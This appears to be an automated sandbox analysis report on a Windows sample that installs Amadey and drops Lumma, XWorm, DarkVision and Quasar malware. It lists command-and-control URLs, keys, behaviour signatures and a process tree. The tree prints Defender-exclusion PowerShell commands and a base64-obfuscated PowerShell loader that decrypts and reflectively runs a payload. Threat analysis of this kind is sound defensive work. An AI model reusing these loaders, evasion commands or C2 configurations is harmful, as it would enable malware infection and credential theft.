Analysis

  • max time kernel
    118s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/04/2025, 05:48

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    9476089ee6fba4b4b9bafff79b0afef2

  • SHA1

    253b4cd213a01ca14a873e71fa3a80dffe43f078

  • SHA256

    fdfec811dd5f93757f3ea461d6e06a872fae95e1fea78c8d8932968f992698b9

  • SHA512

    64e501f6f47f018e7725273b1fa59d4f3906d212955011c2e0720f40321bdf2345358af097b1d482e596a796b1583f0a35acb0cb79e33018b4ce6bcb99060784

  • SSDEEP

    49152:6ME9g869C0jlp17OrAR5bX0PoTcomu1eKmfSOPd:hUg3jlH7GAsUSAAR

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://5pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://starcloc.bet/GOksAo

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:9000

45.134.39.20:9000

Mutex

oV8zKY7m1pKloRzQ

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

darkvision

C2

82.29.67.160

Attributes
  • url

    http://107.174.192.179/data/003

    https://grabify.link/ZATFQO

    http://107.174.192.179/clean

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Detect Xworm Payload 1 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 19 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Sets service image path in registry 2 TTPs 6 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • NTFS ADS 7 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3432
      • C:\Users\Admin\AppData\Local\Temp\random.exe
        "C:\Users\Admin\AppData\Local\Temp\random.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:6076
          • C:\Users\Admin\AppData\Local\Temp\10473270101\518e903f2f.exe
            "C:\Users\Admin\AppData\Local\Temp\10473270101\518e903f2f.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2448
          • C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe
            "C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2744
          • C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe
            "C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:416
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              5⤵
                PID:536
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:5000
            • C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe
              "C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:5844
              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                5⤵
                • Downloads MZ/PE file
                • Checks computer location settings
                • Executes dropped EXE
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3452
                • C:\Users\Admin\AppData\Local\Temp\10052940101\3660442840.exe
                  "C:\Users\Admin\AppData\Local\Temp\10052940101\3660442840.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4112
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10052940101\3660442840.exe"
                    7⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:13740
                • C:\Users\Admin\AppData\Local\Temp\10052950101\557dbebffe.exe
                  "C:\Users\Admin\AppData\Local\Temp\10052950101\557dbebffe.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  PID:14068
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10052950101\557dbebffe.exe"
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:14260
            • C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe
              "C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:4468
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:5196
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Add-MpPreference -ExclusionPath 'C:'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2632
              • C:\Windows\system32\svchost.exe
                "C:\Windows\system32\svchost.exe"
                5⤵
                • Downloads MZ/PE file
                • Adds Run key to start application
                • Suspicious use of WriteProcessMemory
                PID:2508
                • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                  "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                  6⤵
                  • Executes dropped EXE
                  PID:5552
                • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                  "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                  6⤵
                  • Deletes itself
                  • Executes dropped EXE
                  PID:1928
                  • C:\Users\Admin\AppData\Local\Temp\{502e369c-66c6-4d74-b77f-c4f0626d652d}\7cd757f0.exe
                    "C:\Users\Admin\AppData\Local\Temp\{502e369c-66c6-4d74-b77f-c4f0626d652d}\7cd757f0.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                    7⤵
                    • Executes dropped EXE
                    • Checks for VirtualBox DLLs, possible anti-VM trick
                    • System Location Discovery: System Language Discovery
                    PID:6084
                    • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\5d371a91.exe
                      C:/Users/Admin/AppData/Local/Temp/{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}/\5d371a91.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                      8⤵
                      • Drops file in Drivers directory
                      • Sets service image path in registry
                      • Executes dropped EXE
                      • Impair Defenses: Safe Mode Boot
                      • Loads dropped DLL
                      • Adds Run key to start application
                      • Checks for any installed AV software in registry
                      • Enumerates connected drives
                      • Writes to the Master Boot Record (MBR)
                      • Checks for VirtualBox DLLs, possible anti-VM trick
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      • NTFS ADS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:10300
            • C:\Users\Admin\AppData\Local\Temp\10473320101\a1e032013f.exe
              "C:\Users\Admin\AppData\Local\Temp\10473320101\a1e032013f.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5876
            • C:\Users\Admin\AppData\Local\Temp\10473330101\e81bffb557.exe
              "C:\Users\Admin\AppData\Local\Temp\10473330101\e81bffb557.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:14176
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10473330101\e81bffb557.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:14304
            • C:\Users\Admin\AppData\Local\Temp\10473340101\RYZusWg.exe
              "C:\Users\Admin\AppData\Local\Temp\10473340101\RYZusWg.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:6544
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10473351121\ccosvAs.cmd"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:9444
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10473351121\ccosvAs.cmd"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:9960
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Drops startup file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:9496
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:10668
            • C:\Users\Admin\AppData\Local\Temp\10473360101\n0hEgR9.exe
              "C:\Users\Admin\AppData\Local\Temp\10473360101\n0hEgR9.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:10360
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:10248
            • C:\Users\Admin\AppData\Local\Temp\10473370101\Rm3cVPI.exe
              "C:\Users\Admin\AppData\Local\Temp\10473370101\Rm3cVPI.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:11632
            • C:\Users\Admin\AppData\Local\Temp\10473380101\mTk60rz.exe
              "C:\Users\Admin\AppData\Local\Temp\10473380101\mTk60rz.exe"
              4⤵
              • Executes dropped EXE
              PID:11088
              • C:\Users\Admin\AppData\Local\Temp\onefile_11088_133883922394436856\ZSoeRVBe.exe
                C:\Users\Admin\AppData\Local\Temp\10473380101\mTk60rz.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                PID:10252
            • C:\Users\Admin\AppData\Local\Temp\10473390101\f050f8d759.exe
              "C:\Users\Admin\AppData\Local\Temp\10473390101\f050f8d759.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:12148
            • C:\Users\Admin\AppData\Local\Temp\10473400101\LJl8AAr.exe
              "C:\Users\Admin\AppData\Local\Temp\10473400101\LJl8AAr.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:1204
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:13944
